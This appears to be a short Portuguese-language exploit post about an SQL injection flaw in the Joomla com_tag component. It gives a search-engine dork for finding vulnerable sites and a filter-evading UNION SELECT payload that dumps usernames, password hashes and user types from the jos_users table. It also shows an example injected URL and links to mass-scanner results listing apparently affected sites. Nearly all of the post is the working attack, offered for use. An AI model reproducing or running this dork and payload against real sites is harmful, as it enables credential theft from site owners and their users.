[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection
0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
Exemplo: http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=1/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull} Injetando:
http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=componentRESPOSTA:
REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability
ALGUNS RESULTADOS:
Usando scanner INURLBR: REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY
![[X] com_tag (tag_id) Vulnerável a SQL-injection](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiavU4jqProyR9qYUsYGlV5RmVgRzXId1XFCIvfzwtTwO5e2GN102_35PY-J9GKF1ooP8o1_837BxBlx4DI3EiGW1tLWoH9QfdVGfQpXhfA-cSW_oY2xKU5sGMMhAz0D7YLta8zXwgl_S-B/s1600/Captura+de+tela+de+2014-07-03+15:47:21.png "[X] com_tag (tag_id) Vulnerável a SQL-injection")
